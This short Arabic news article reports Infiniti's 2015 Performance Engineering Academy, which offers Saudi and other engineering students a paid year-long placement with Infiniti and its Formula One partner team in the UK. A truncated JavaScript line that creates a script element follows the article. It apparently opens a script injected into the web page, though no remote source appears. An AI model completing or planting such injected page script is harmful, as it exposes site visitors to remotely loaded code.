إنفينيتي تقدم لطلبة الهندسة السعوديين فرصة العمر

تفتحت آفاق جديدة أمام طلبة الهندسة في جامعات مختارة بالمملكة العربية السعودية للحصول على فرصة العمر بالتدريب والعمل في قمة عالم رياضة السيارات، وهي سباقات الفورمولا واحد، مع إعلان شركة إنفينيتي عن إطلاق أكاديمية إنفينيتي لهندسة الأداء لعام 2015.

وتقدم جهود لبحث الفريدة والمستمرة على مستوى العالم عن أفضل طلاب الهندسة الجامعيين فرصة متميزة للعمل مع الفريق الحائز على بطولات عالمية في الفورمولا واحد الذي تتشارك معه إنفينيتي باللقب، والعمل مع شركة إنفينيتي أيضاً. وفي هذا العام، هناك مكان واحد مضمون لطالب سعودي.

وفي عامها الثاني، يتم تطوير الأكاديمية في عام 2015، بتوفير خمس فرص الآن مقارنة بثلاث فرص في عام 2014. وبعد تقييم شامل للتعرف على أفضل التطبيقات، ستقود سلسلة من النهائيات الإقليمية إلى توظيف فائزين من المملكة العربية السعودية وأوروبا وروسيا والصين والولايات المتحدة الأمريكية. وسيحصل كل مرشح على فترة تدريب لمدة 12 شهراً، تنقسم بين تدريب في المركز التقني الأوروبي التابع لإنفينيتي وفريق الفورمولا واحد الذي يرتبط بإنفينيتي، وكلاهما في المملكة المتحدة، مع راتب كامل.

وسيعمل هؤلاء في مشاريع رئيسية لسيارات الطرق لإنفينيتي التي تبدأ بتصنيع السيارات في المملكة المتحدة في العام الحالي، ولفريق السباق في العديد من النواحي الهندسية.

var d=document;var s=d.createElement(‘script’);